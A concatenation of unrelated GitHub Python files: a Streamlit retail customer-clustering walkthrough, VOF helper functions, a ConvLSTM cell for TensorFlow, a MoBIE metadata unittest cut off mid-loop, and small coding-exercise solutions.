first we need to give some proper format to some data.\n - As we already grouped our products into five different clusters we must incorporate this information into the dataframe, we are going to create a new column/feature called Product_Category and it will hold the cluster of each product.\n - We create product_category dictionary, we iterate trough zipping list_descriptions and clusters as key for descriptions from list_descriptions 
and val for the number of cluster from clusters, then we assign to product_category[key] the value of val.\n - product_category will have the descriptions and to what cluster they belong.\n \"\"\")\n\n product_category = dict()\n for key, val in zip (list_descriptions, clusters):\n product_category[key] = val\n\n st.markdown(\"\"\"\n We create the column Product_Category and we assign it the categories by mapping with\n df_cleaned.loc[:, 'Description'].map(product_category).\n \"\"\")\n\n df_cleaned['Product_Category'] = df_cleaned.loc[:, 'Description'].map(product_category)\n\n st.dataframe(df_cleaned.sample(5))\n\n st.markdown(\"\"\"\n We now have every transaction and its category.\n - `Grouping the Products`\n - Let's create a `Cat_N` variables (with $N$ $∈$ $[0:4]$ ) that contains the amount spent in each product category.\n \"\"\")\n\n st.markdown(\"\"\"\n Create a column in which we will have how much money each customer spent in each category.\n \"\"\")\n\n for i in range(5):\n col = 'Cat_{}'.format(i) \n df_temp = df_cleaned[df_cleaned['Product_Category'] == i]\n price_temp = df_temp['TotalPrice']\n price_temp = price_temp.apply(lambda x:x if x > 0 else 0)\n df_cleaned.loc[:, col] = price_temp\n df_cleaned[col].fillna(0, inplace = True)\n\n st.dataframe(df_cleaned.sample(5))\n\n st.markdown(\"\"\"\n Now we create a temporal DataFrame object temp, in this new temporal dataframe we are going to hold the TotalPrice sum grouped by CustomerID and InvoiceNo, then we are going to assign to cart_price the values from temp.\n \"\"\")\n st.code(\"\"\"\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n \"\"\")\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n\n st.markdown(\"\"\"\n Then we iterate in a `for` loop a range of `5` iterations with `i` as iterator index, inside this loop we first assign to the var `col` the name of the column `Cat_{i}`, then we assign to `temp` the result from grouping `CustomerID` and `InvoiceNo` and the sum of `col`, then we assign to `cart_price` in the column `col` the values in `temp`. 
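 (Strictly speaking `temp` is a three-column frame here, so the unambiguous form of the assignment is a sketch like `cart_price.loc[:, col] = temp[col]`, selecting the single summed column before assigning it.)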
\n \"\"\")\n\n st.code(\"\"\"\n for i in range(5):\n col = 'Cat_{}'.format(i) \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)[col].sum()\n cart_price.loc[:, col] = temp\n \"\"\")\n\n for i in range(5):\n col = 'Cat_{}'.format(i) \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)[col].sum()\n cart_price.loc[:, col] = temp\n\n st.dataframe(cart_price.head(5))\n\n st.markdown(\"####### Now what are we going to do is to add the dates of the transactions to the dataframe cart_price\")\n\n df_cleaned['InvoiceDate_int'] = df_cleaned['InvoiceDate'].astype(np.datetime64).astype(np.int64)\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['InvoiceDate_int'].mean()\n df_cleaned.drop('InvoiceDate_int', axis = 1, inplace = True)\n cart_price.loc[:, 'InvoiceDate'] = pd.to_datetime(temp['InvoiceDate_int'])\n\n st.markdown(\"\"\"\n Now we are going to filter in cart_price the values from the column Cart Price that are bigger than 0, then we sort its values in ascending order according to CustomerID column and display the first 5 samples in this dataframe.\n \"\"\")\n\n cart_price = cart_price[cart_price['Cart Price'] > 0]\n cart_price.sort_values('CustomerID', ascending = True).head(5)\n\n st.write(\"Oldest transactions\")\n\n st.write(\"min invoice date: {}\".format(cart_price['InvoiceDate'].min()))\n st.write(\"max invoice date: {}\".format(cart_price['InvoiceDate'].max()))\n\n st.markdown(\"\"\"\n ### Taking Care of Data Over Time\n We have to remember (see code bellow) that we have data from 1 exact year. \n * The main objectives of this notebook is to develop a model to characterizing and anticipating the habits of the customers visiting the online retail from their first visit. \n * How can we test the model in a realistic way?, We can split the dataset by keeping the first 10 months for training, development and testing of the model and do the last two months the same way in order to see if there are not any differences among the evaluations scores it means that we are good. \n * Now let's define a var date_limit which is going to work as the limit day for comparison.\n * The reasons is because we cannot train the model in the first ten months and test it with the last 2 months because we will lose seasonality. 
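 (With records spanning December 2010 to December 2011, as the timestamps below show, the held-out final two months would contain the Christmas run-up, a pattern the first ten months never see.)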
\n * Additionally we have to mention that we experiment to test with the last 2 months the model trained with the first 10 months and it was preforming very bad\n \"\"\")\n\n st.code(\"\"\"\n # Original start dataframe\n df['InvoiceDate'] = df['InvoiceDate'].astype('datetime64[ns]')\n df.InvoiceDate.max(), df.InvoiceDate.min()\n \"\"\")\n st.markdown(\"\"\"\n **Output:** (Timestamp('2011-12-09 12:50:00'), Timestamp('2010-12-01 08:26:00'))\n \"\"\")\n\n import datetime\n date_limit = np.datetime64(datetime.date(2011, 10, 1))\n date_limit\n\n st.markdown(\"\"\"\n ### As we mentioned above we will train \n train_set: data from cart_price that was registered before the date 2011-10-1 and\n test_set: data from cart_price that was registered during and after the date 2011-10-1.\n \"\"\")\n\n st.code(\"\"\"\n train_set = cart_price[cart_price['InvoiceDate'] < date_limit]\n test_set = cart_price[cart_price['InvoiceDate'] >= date_limit]\n \"\"\")\n\n train_set = cart_price[cart_price['InvoiceDate'] < date_limit]\n test_set = cart_price[cart_price['InvoiceDate'] >= date_limit]\n\n cart_price = train_set.copy(deep = True)\n\n st.write(\"Train Set DF:\")\n st.dataframe(train_set.tail(5))\n st.write(\"Test Set DF: \")\n st.dataframe(test_set.head(5))\n\n st.markdown(\"\"\"\n Then we create the DataFrame object `transactions_per_user`, in this new dataframe we assign the values of count, min, max, mean and sum from gruping by CustomerID and Cart Price. The information on transactions_per_user is just basic statistics of the values found in the Cart Price of each customer.\n \"\"\")\n\n transactions_per_user=cart_price.groupby(by=['CustomerID'])['Cart Price'].agg(['count','min','max','mean','sum'])\n st.dataframe(transactions_per_user)\n\n for i in range(5):\n col = 'Cat_{}'.format(i)\n transactions_per_user.loc[:,col] = cart_price.groupby(by=['CustomerID'])[col].sum() / transactions_per_user['sum']*100\n\n st.dataframe(transactions_per_user.head(5))\n\n st.markdown(\"\"\"\n * We group cart_price dataframe by CustomerID and sum the values from Category_0 column.\n * Therefore cart_price will have how much each customer has bought in Category_0.\n \"\"\")\n\n transactions_per_user.reset_index(drop=False, inplace=True)\n cart_price.groupby(by=['CustomerID'])['Cat_0'].sum()\n st.dataframe(transactions_per_user.sort_values('CustomerID', ascending=True).head(5))\n\n st.markdown(\"\"\"\n Lets define two additional columns for the number of days elapsed since the first purchase ( FirstPurchase ) and the number of days since the last purchase ( LastPurchase ):\n\n We take in last_date the maximun date on InvoiceDate from cart_price.\n \"\"\")\n\n last_date = cart_price['InvoiceDate'].max().date()\n st.write(\"Last date: {}\".format(last_date))\n\n st.markdown(\"\"\"\n Let's create the next dataframes `first_registration` for the first date that a customer made a transaction, this is done through grouping by CustomerID and taking the minimun date from InvoiceDate and for last_purchase dataframe we take the last date that a customer made a transaction, this is done through grouping by CustomerID and taking the maximum date from InvoiceDate.\n \"\"\")\n\n st.code(\"\"\"\n first_registration = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].min())\n last_purchase = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].max())\n \"\"\")\n\n first_registration = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].min())\n last_purchase = 
pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].max())\n st.dataframe(first_registration.head())\n st.dataframe(last_purchase.head())\n\n st.markdown(\"\"\"\n We have seen what info do first_registration and last_purchase are holding, now we are going to calculate how many days have passed, this is done by creating two separete dataframe, one for first_registration and last_purchase.\n\n Let's create test_fp a dataframe, where we are going to apply a lambda function that calculates the days that have to first_registration with the function applymap(lambda x:(last_date - x.date()).days).\n\n Now we are going to create test_lp a dataframe, where we are going to apply a lambda function that calculates the days that have to last_purchase with the function applymap(lambda x:(last_date - x.date()).days).\n \"\"\")\n\n st.code(\"\"\"\n test_fp = first_registration.applymap(lambda x:(last_date - x.date()).days)\n test_lp = last_purchase.applymap(lambda x:(last_date - x.date()).days)\n \"\"\")\n test_fp = first_registration.applymap(lambda x:(last_date - x.date()).days)\n test_lp = last_purchase.applymap(lambda x:(last_date - x.date()).days)\n\n st.markdown(\"\"\"\n We are going to create new columns for transactions_per_user, one column called `FirstPurchase` and other column named `LastPurchase`.\n\n `FirstPurchase`: is going to take the values from test_fp, we do not reset its index, this will match the CustomerID in transactions_per_user. `LastPurchase`: is going to take the values from test_lp, we do not reset its index, this will match the CustomerID in transactions_per_user.\n \"\"\")\n\n st.code(\"\"\"\n transactions_per_user.loc[:, 'FirstPurchase'] = test_fp.reset_index(drop=False)['InvoiceDate']\n transactions_per_user.loc[:, 'LastPurchase'] = test_lp.reset_index(drop=False)['InvoiceDate']\n \"\"\")\n\n transactions_per_user.loc[:, 'FirstPurchase'] = test_fp.reset_index(drop=False)['InvoiceDate']\n transactions_per_user.loc[:, 'LastPurchase'] = test_lp.reset_index(drop=False)['InvoiceDate']\n\n\n st.dataframe(transactions_per_user.head(5))\n\n\n st.markdown(\"\"\"\n ## Creating Customers Categories\n #### Data Encoding\n * `transactions_per_user` is a DF that contains a summary of all the transaction that were made by each client. 
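Because KMeans relies on Euclidean distance, these features are MinMax-scaled below so that large-magnitude columns such as `count` or `max` do not dominate the percentage-valued `Cat_i` columns. 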
\n * This information will be used to characterize the different types of customers and only keep a subset of variables:\n * Let's create a list call list_cols that will hold the features that are going to be used for the model to learn patterns in order to define the clusters.\n \"\"\")\n list_cols = ['count','min','max','mean','Cat_0','Cat_1','Cat_2','Cat_3','Cat_4', 'LastPurchase', 'FirstPurchase']\n\n selected_customers = transactions_per_user.copy(deep=True)\n matrix = selected_customers[list_cols].to_numpy()\n\n from sklearn.preprocessing import StandardScaler, MinMaxScaler\n minmax_scaler = MinMaxScaler()\n minmax_scaler.fit(matrix)\n minmaxscaled_matrix = minmax_scaler.transform(matrix)\n\n st.markdown(\"\"\"\n #### Creation of Customer Categories\n\n Well it is the time we all have been waiting, the creation of this clusters will be done by using KMeans, it is a very similar process as the one we did with creating the clusters for words with KModes.\n \\n\n This may take a while!\n \\n\n The best number of clusters will be defined by the technique Elbow Method.\n \"\"\")\n\n st.write(\"Run the code bellow to find the best K using k-means (we cannot run it in streamlit because we used the go Figure)\")\n st.code(\"\"\"\n for n_clusters in range(1, 21):\n kmeans = KMeans(init='k-means++', max_iter=100, n_clusters=n_clusters, n_init=100, random_state=42).fit(minmaxscaled_matrix)\n inertia.append(kmeans.inertia_)\n clusters_history['inertia'] = inertia\n clusters_history\n\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=clusters_history.cluster_range,\n y=clusters_history.inertia,\n name='Clusters',\n text='Quantity of Clusters and Inertia Value'))\n fig.update_layout(\n title_text='Clusters vs Inertia',\n title_x=0.5,\n xaxis = dict(\n title='Quantity Clusters'),\n yaxis = dict(title='Inertia')\n )\n fig.show()\n \"\"\")\n \n st.write(\"\"\"\n ##### After experimenting with the clusters we conclude that 14 clusters is the right value for n_clusters\n \"\"\")\n\n with st.spinner('Clustering - Grouping Cutomers: Wait for it...'):\n n_clusters = 14\n kmeans = KMeans(init='k-means++', max_iter=100, n_clusters=n_clusters, n_init=100, random_state=42)\n kmeans.fit(minmaxscaled_matrix)\n\n if 'kmeans' not in st.session_state:\n st.session_state['kmeans'] = kmeans\n \n # we ran the code bellow to store kmeans model once\n # with open(\"./src/models/kmeans.pkl\", \"wb\") as f:\n # pickle.dump(kmeans, f)\n \n clients_clusters = kmeans.predict(minmaxscaled_matrix)\n silhouette_avg = silhouette_score(minmaxscaled_matrix, clients_clusters)\n print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n\n st.write(\"print the frequencies of the clusters\")\n st.dataframe(pd.DataFrame(pd.Series(clients_clusters).value_counts(), columns = ['Quantity of Clients in Cluster']).T)\n\n st.write(\"Plot the silhouette graph and evaluate\")\n sample_silhouette_values = silhouette_samples(minmaxscaled_matrix, clients_clusters)\n graph_component_silhouette(n_clusters, [-0.15, 0.55], len(minmaxscaled_matrix), sample_silhouette_values, clients_clusters)\n\n st.markdown(\"\"\"\n * Some of the clusters are indeed disjoint. It remains to understand the habits of the customers in each cluster. 
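 Once the cluster label is attached in the next step, a one-liner such as `selected_customers[selected_customers['cluster'] == i].mean()` (the same expression used in the loop further below) gives a quick per-cluster profile.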
\n * To do so, we start by adding to the selected_customers dataframe a variable that defines the cluster to which each client belongs.\n \"\"\")\n\n st.code(\"selected_customers.loc[:, 'cluster'] = clients_clusters\")\n selected_customers.loc[:, 'cluster'] = clients_clusters\n\n st.markdown(\"\"\"\n * Then, We average the contents of this dataframe by first selecting the different groups of clients. \n * This gives access to, for example, the average cart price, the number of visits or the total sums spent by the clients of the different clusters. \n * We also determine the number of clients in each group (variable size ):\n \"\"\")\n\n merged_df = pd.DataFrame()\n for i in range(n_clusters):\n test_fp = pd.DataFrame(selected_customers[selected_customers['cluster'] == i].mean())\n test_fp = test_fp.T.set_index('cluster', drop = True)\n test_fp['size'] = selected_customers[selected_customers['cluster'] == i].shape[0]\n merged_df = pd.concat([merged_df, test_fp])\n st.dataframe(merged_df)\n\n # merged_df.drop('CustomerID', axis = 1, inplace = True)\n print('number of customers:', merged_df['size'].sum())\n merged_df = merged_df.sort_values('sum')\n\n st.markdown(\"\"\"\n * Finally, We re-organize the content of the dataframe by ordering the different clusters: \n * First, in relation to the amount spent in each product category and then, according to the total amount spent:\n \"\"\")\n\n st.code(\"\"\"\n list_index = []\n for i in range(5):\n column = 'Cat_{}'.format(i)\n list_index.append(merged_df[merged_df[column] > 45].index.values[0])\n\n list_index_reordered = list_index\n list_index_reordered += [ s for s in merged_df.index if s not in list_index]\n\n merged_df = merged_df.reindex(index = list_index_reordered)\n merged_df = merged_df.reset_index(drop = False)\n merged_df[['cluster', 'count', 'min', 'max', 'mean', 'sum', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'size']]\n\n columns = ['count','min', 'max', 'mean', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'LastPurchase', 'FirstPurchase']\n X_fp = selected_customers[columns]\n Y_fp = selected_customers['cluster']\n \"\"\")\n\n list_index = []\n for i in range(5):\n column = 'Cat_{}'.format(i)\n list_index.append(merged_df[merged_df[column] > 45].index.values[0])\n\n list_index_reordered = list_index\n list_index_reordered += [ s for s in merged_df.index if s not in list_index]\n\n merged_df = merged_df.reindex(index = list_index_reordered)\n merged_df = merged_df.reset_index(drop = False)\n merged_df[['cluster', 'count', 'min', 'max', 'mean', 'sum', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'size']]\n\n columns = ['count','min', 'max', 'mean', 'Cat_0', 'Cat_1', 'Cat_2', 'Cat_3', 'Cat_4', 'LastPurchase', 'FirstPurchase']\n X_fp = selected_customers[columns]\n Y_fp = selected_customers['cluster']\n\n st.write(\"\"\"\n ##### Now lets see some products of each category to understand what each category buys in combination with the table above\n \"\"\")\n with st.spinner('Product Lists creation in progress: Wait for it...'):\n\n list_products_cat_0 = []\n list_products_cat_1 = []\n list_products_cat_2 = []\n list_products_cat_3 = []\n list_products_cat_4 = []\n for index, row in df_cleaned.iterrows():\n if row['Product_Category'] == 0:\n list_products_cat_0.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 1:\n list_products_cat_1.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 2:\n list_products_cat_2.append([row['Description'], row['StockCode']])\n if 
row['Product_Category'] == 3:\n list_products_cat_3.append([row['Description'], row['StockCode']])\n if row['Product_Category'] == 4:\n list_products_cat_4.append([row['Description'], row['StockCode']])\n\n st.write(\"**Cat_0 Sample of 3 products:**\")\n st.write(list_products_cat_0[:3])\n st.write(\"**Cat_1 Sample of 3 products:**\")\n st.write(list_products_cat_1[:3])\n st.write(\"**Cat_2 Sample of 3 products:**\")\n st.write(list_products_cat_2[:3])\n st.write(\"**Cat_3 Sample of 3 products:**\")\n st.write(list_products_cat_3[:3])\n st.write(\"**Cat_4 Sample of 3 products:**\")\n st.write(list_products_cat_4[:3])","repo_name":"PambosH96/Machine-Learning-Project-for-Retailer","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":38314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13359133746","text":"import numpy as np\n\ndef fieldAverage(alpha1, field, value1, value2):\n mesh = alpha1.mesh\n\n for i in range(mesh.nx+2):\n for j in range(mesh.ny+2):\n field.cells[i,j] = value1*alpha1.cells[i,j] + value2*(1.-alpha1.cells[i,j])\n\n\ndef readVofi(filename, nx, ny):\n\n # Cell centered field without ghost cells\n cc = np.zeros([nx, ny])\n nplines = np.zeros(nx*ny)\n\n f = open(filename, \"r\")\n lines = f.readlines()\n\n for count, line in enumerate(lines):\n nplines[count] = float(line)\n\n count = 0\n for i in range(nx):\n for j in range(ny):\n cc[i,j] = nplines[count]\n count += 1\n\n return cc\n\n\ndef readVofi(filename, field):\n\n nx = field.mesh.nx\n ny = field.mesh.ny\n\n # Cell centered field without ghost cells\n nplines = np.zeros(nx*ny)\n\n f = open(filename, \"r\")\n lines = f.readlines()\n\n for count, line in enumerate(lines):\n nplines[count] = float(line)\n\n count = 0\n for i in range(nx):\n for j in range(ny):\n field.cells[i+1,j+1] = nplines[count]\n count += 1\n\n","repo_name":"edocipriano/fassa","sub_path":"fassa/vof/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"69934635443","text":"import tensorflow as tf\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import rnn_cell_impl\nfrom tensorflow.python.ops import variable_scope as vs\n\n\nclass ConvLSTMCell(rnn_cell_impl.RNNCell):\n \"\"\"Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n\n def __init__(self,\n conv_ndims,\n input_shape,\n output_channels,\n kernel_shape,\n use_bias=True,\n skip_connection=False,\n forget_bias=1.0,\n initializers=None,\n name=\"conv_lstm_cell\"):\n \"\"\"Construct ConvLSTMCell.\n Args:\n conv_ndims: Convolution dimensionality (1, 2 or 3).\n input_shape: Shape of the input as int tuple, excluding the batch size.\n output_channels: int, number of output channels of the conv LSTM.\n kernel_shape: Shape of kernel as in tuple (of size 1,2 or 3).\n use_bias: Use bias in convolutions.\n skip_connection: If set to `True`, concatenate the input to the\n output of the conv LSTM. 
Default: `False`.\n forget_bias: Forget bias.\n name: Name of the module.\n Raises:\n ValueError: If `skip_connection` is `True` and stride is different from 1\n or if `input_shape` is incompatible with `conv_ndims`.\n \"\"\"\n super(ConvLSTMCell, self).__init__(name=name)\n\n if conv_ndims != len(input_shape)-1:\n raise ValueError(\"Invalid input_shape {} for conv_ndims={}.\".format(\n input_shape, conv_ndims))\n\n self._conv_ndims = conv_ndims\n self._input_shape = input_shape\n self._output_channels = output_channels\n self._kernel_shape = kernel_shape\n self._use_bias = use_bias\n self._forget_bias = forget_bias\n self._skip_connection = skip_connection\n\n self._total_output_channels = output_channels\n if self._skip_connection:\n self._total_output_channels += self._input_shape[-1]\n\n state_size = tensor_shape.TensorShape(self._input_shape[:-1] \n + [self._output_channels])\n self._state_size = rnn_cell_impl.LSTMStateTuple(state_size, state_size)\n self._output_size = tensor_shape.TensorShape(self._input_shape[:-1]\n + [self._total_output_channels])\n\n @property\n def output_size(self):\n return self._output_size\n\n @property\n def state_size(self):\n return self._state_size\n\n def call(self, inputs, state, scope=None):\n cell, hidden = state\n new_hidden = _conv([inputs, hidden],\n self._kernel_shape,\n 4*self._output_channels,\n self._use_bias)\n gates = array_ops.split(value=new_hidden,\n num_or_size_splits=4,\n axis=self._conv_ndims+1)\n\n input_gate, new_input, forget_gate, output_gate = gates\n new_cell = math_ops.sigmoid(forget_gate + self._forget_bias) * cell\n new_cell += math_ops.sigmoid(input_gate) * math_ops.tanh(new_input)\n output = math_ops.tanh(new_cell) * math_ops.sigmoid(output_gate)\n\n if self._skip_connection:\n output = array_ops.concat([output, inputs], axis=-1)\n new_state = rnn_cell_impl.LSTMStateTuple(new_cell, output)\n return output, new_state\n\nclass Conv1DLSTMCell(ConvLSTMCell):\n \"\"\"1D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_1d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv1DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv1DLSTMCell, self).__init__(conv_ndims=1, **kwargs)\n\nclass Conv2DLSTMCell(ConvLSTMCell):\n \"\"\"2D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_2d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv2DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv2DLSTMCell, self).__init__(conv_ndims=2, **kwargs)\n\nclass Conv3DLSTMCell(ConvLSTMCell):\n \"\"\"3D Convolutional LSTM recurrent network cell.\n\n https://arxiv.org/pdf/1506.04214v1.pdf\n \"\"\"\n def __init__(self, name=\"conv_3d_lstm_cell\", **kwargs):\n \"\"\"Construct Conv3DLSTM. See `ConvLSTMCell` for more details.\"\"\"\n super(Conv3DLSTMCell, self).__init__(conv_ndims=3, **kwargs)\n\ndef _conv(args, \n filter_size,\n num_features,\n bias,\n bias_start=0.0):\n \"\"\"convolution:\n Args:\n args: a Tensor or a list of Tensors of dimension 3D, 4D or 5D, \n batch x n, Tensors.\n filter_size: int tuple of filter height and width.\n num_features: int, number of features.\n bias_start: starting value to initialize the bias; 0 by default.\n Returns:\n A 3D, 4D, or 5D Tensor with shape [batch ... 
num_features]\n Raises:\n ValueError: if some of the arguments has unspecified or wrong shape.\n \"\"\"\n\n # Calculate the total size of arguments on dimension 1.\n total_arg_size_depth = 0\n shapes = [a.get_shape().as_list() for a in args]\n shape_length = len(shapes[0])\n for shape in shapes:\n if len(shape) not in [3,4,5]:\n raise ValueError(\"Conv Linear expects 3D, 4D or 5D arguments: %s\" % str(shapes))\n if len(shape) != len(shapes[0]):\n raise ValueError(\"Conv Linear expects all args to be of same Dimensiton: %s\" % str(shapes))\n else:\n total_arg_size_depth += shape[-1]\n dtype = [a.dtype for a in args][0]\n\n # determine correct conv operation\n if shape_length == 3:\n conv_op = nn_ops.conv1d\n strides = 1\n elif shape_length == 4:\n conv_op = nn_ops.conv2d\n strides = shape_length*[1]\n elif shape_length == 5:\n conv_op = nn_ops.conv3d\n strides = shape_length*[1]\n\n # Now the computation.\n kernel = vs.get_variable(\n \"kernel\", \n filter_size + [total_arg_size_depth, num_features],\n dtype=dtype)\n if len(args) == 1:\n res = conv_op(args[0], kernel, strides, padding='SAME')\n \n else:\n input_tensor = array_ops.concat(axis=shape_length-1, values=args)\n inshape = tf.shape(input_tensor)\n depth_batch_size = inshape[0]\n \n\n outshape = [inshape[0], inshape[1], tf.shape(kernel)[-1]]\n\n res = tf.cond(tf.equal(depth_batch_size, 0),\n lambda: tf.zeros(outshape),\n lambda: conv_op(input_tensor, kernel, strides, padding='SAME'))\n if not bias:\n return res\n bias_term = vs.get_variable(\n \"biases\", [num_features],\n dtype=dtype,\n initializer=init_ops.constant_initializer(\n bias_start, dtype=dtype))\n return res + bias_term\n","repo_name":"evelkey/dynamic-segmentation","sub_path":"segmentation/conv_lstm_cell.py","file_name":"conv_lstm_cell.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"72062289523","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n#\r\n# Complete the 'hourglassSum' function below.\r\n#\r\n# The function is expected to return an INTEGER.\r\n# The function accepts 2D_INTEGER_ARRAY arr as parameter.\r\n#\r\n\r\n\r\n\r\ndef hourglassSum(arr):\r\n sumList = []\r\n for n in range(4):\r\n for i in range(4):\r\n sum = 0\r\n for j in range(i, i+3):\r\n for k in range(n, n+3):\r\n if j == i+1 and (k == n or k == n+2):\r\n sum += 0\r\n else:\r\n sum += arr[j][k]\r\n sumList.append(sum)\r\n return max(sumList)\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n arr = []\r\n\r\n for _ in range(6):\r\n arr.append(list(map(int, input().rstrip().split())))\r\n\r\n result = hourglassSum(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"datahubber/ProgramMethod","sub_path":"Data Structures/max hourglass in a 2D array/max hourglass in a 2D array.py","file_name":"max hourglass in a 2D array.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"20269469363","text":"'''\nn = 2, there are k * 1 way to painting same color. and k(k-1) way for different\ncolor.\nn = 3, if 1st and 2nd fence are same color(k*1), the 3rd one has k-1 posible ways,\nif 1st & 2nd are diff, the 3rd has k-1 way for diff color and 1 way for same color\nwith previous fence. its k * (k-1) or (k*(k-1)) * 1. k(k-1)\nprevious fences have k + k(k-1) possible combinations. 
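(sanity check with n = 3, k = 2: at n = 2 we have same = 2 and diff = 2;\nstepping to n = 3 gives same = 2, diff = (2+2)*1 = 4, total 6, matching the\n2^3 - 2 three-fence sequences that avoid three consecutive equal colors)\n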
","repo_name":"JinXJinX/practice","sub_path":"leetcode/276_Paint_Fence.py","file_name":"276_Paint_Fence.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"7662692984","text":"import os\nimport unittest\nfrom shutil import rmtree\nfrom subprocess import run\nfrom sys import platform\n\nimport mobie\nimport numpy as np\nimport pandas as pd\n\nfrom elf.io import open_file\nfrom mobie.xml_utils import parse_s3_xml\nfrom mobie.validation.utils import validate_with_schema\n\n\nclass TestRemoteMetadata(unittest.TestCase):\n test_folder = \"./test-folder\"\n root = \"./test-folder/data\"\n shape = (64, 64, 64)\n dataset_name = \"test\"\n datasets = [dataset_name, \"test_relative\"]\n\n def init_dataset(self, file_format):\n data_path = os.path.join(self.test_folder, \"data.h5\")\n data_key = \"data\"\n with open_file(data_path, \"a\") as f:\n f.create_dataset(data_key, data=np.random.rand(*self.shape))\n\n tmp_folder = os.path.join(self.test_folder, \"tmp-init\")\n\n raw_name = \"test-raw\"\n scales = [[2, 2, 2]]\n mobie.add_image(data_path, data_key, self.root, self.dataset_name, raw_name,\n resolution=(1, 1, 1), chunks=(32, 32, 32), scale_factors=scales,\n tmp_folder=tmp_folder, file_format=file_format)\n\n # add a region source (which does not have imageData)\n # to make sure it is properly handled when adding the remote metadata\n dummy_table = pd.DataFrame.from_dict({\n \"region_id\": list(range(10)),\n \"dummy\": np.random.rand(10),\n })\n mobie.metadata.add_regions_to_dataset(os.path.join(self.root, self.dataset_name), \"my-regions\",\n default_table=dummy_table)\n\n # add an image source pointing to another dataset to make sure\n # that its relative path is correctly translated into remote paths\n\n if not file_format.startswith(\"bdv\"):\n new_ds = self.datasets[1]\n new_ds_path = os.path.join(self.root, new_ds)\n\n mobie.metadata.add_dataset(self.root, new_ds, False)\n os.makedirs(new_ds_path, exist_ok=True)\n mobie.metadata.create_dataset_metadata(new_ds_path)\n data_path, image_metadata_path = mobie.utils.get_internal_paths(os.path.join(self.root, self.dataset_name),\n file_format, raw_name)\n mobie.metadata.add_source_to_dataset(new_ds_path, \"image\", new_ds, image_metadata_path)\n rel_view = mobie.metadata.read_dataset_metadata(new_ds_path)[\"views\"][new_ds]\n mobie.metadata.add_view_to_dataset(new_ds_path, \"default\", rel_view)\n\n def setUp(self):\n os.makedirs(self.test_folder, exist_ok=True)\n\n def tearDown(self):\n try:\n rmtree(self.test_folder)\n except OSError:\n pass\n\n def _check_remote_metadata(self, file_format, service_endpoint, bucket_name):\n for idx, dataset_name in enumerate(self.datasets):\n if file_format.startswith(\"bdv\") and idx > 0:\n continue\n\n dataset_folder = os.path.join(self.root, dataset_name)\n dataset_metadata = mobie.metadata.read_dataset_metadata(dataset_folder)\n validate_with_schema(dataset_metadata, \"dataset\")\n\n new_file_format = file_format + \".s3\"\n\n sources = dataset_metadata[\"sources\"]\n for name, 
